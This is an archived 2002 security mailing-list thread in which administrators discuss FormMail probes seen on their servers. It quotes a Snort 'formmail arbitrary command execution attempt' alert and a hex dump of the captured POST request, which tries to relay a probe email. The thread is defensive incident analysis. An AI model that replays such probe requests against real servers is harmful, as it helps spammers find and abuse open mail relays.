|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: sunzi (sunzi_at_mod-x.co.uk)
Date: Thu Sep 05 2002 - 11:58:19 CDT
I've been seeing these on my production network for almost 2 months now ...
very anoying on my IIS Server with no Perl <g> I've seen 3 diffent scripts
so far. 1 is very basic, only placing the site name in the message in plain
text. The one you have I've also seen and the encoded text is a very
detailed reporting of the found formmail script (which is why i say it's a
different one). The last one i've seen so far is one referring to VOID
realname= (looks script kiddie proofed ;). I'll dig up some traces for
corelation.
cheers,
sunzi
----- Original Message -----
From: "Russell Fulton" <r.fulton
auckland.ac.nz>
To: <incidentssecurityfocus.com>
Sent: Wednesday, September 04, 2002 10:23 PM
Subject: new type of formmail probes
> Hi All,
> Over the last week or so snort has been picking up many probes like
> this:
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> [**] WEB-CGI formmail arbitrary command execution attempt [**]
> 09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x30F
> 62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226
IpLen:20 DgmLen:769 DF
> ***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20
> 50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
> 72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1
> 2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER
> 56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection:
> 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con
> 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402
> 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
> 7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9
> 35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T
> 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
> 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle
> 6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima
> 67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x-
> 78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j
> 70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application
> 2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re
> 66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa
> 31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18fdj10.com&rec
> 69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx
> 40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E aol.com>www.cs.
> 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s
> 75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au
> 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc
> 67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai
> 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20
> 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20%
> 32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox
> 79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0
> 41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A%
> 32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm
> 25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04
> 25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A%
> 32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www.
> 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n
> 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo
> 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www
> 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac.
> 6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff
> 6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA>
> 25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D%
> 30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0
> 44 25 30 41 6F 78 79 35 32 D%0Aoxy52
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> Am I right in assuming that this just more spammers looking for places
> to launder mail or is it more sinister than that? I.e. do we believe
> the 'arbitrary command execution attempt' bit?
>
> Cheers, Russell.
>
> --
> Russell Fulton, Computer and Network Security Officer
> The University of Auckland, New Zealand
>
> "It aint necessarily so" - Gershwin
>
>
> --------------------------------------------------------------------------
-- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com >---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]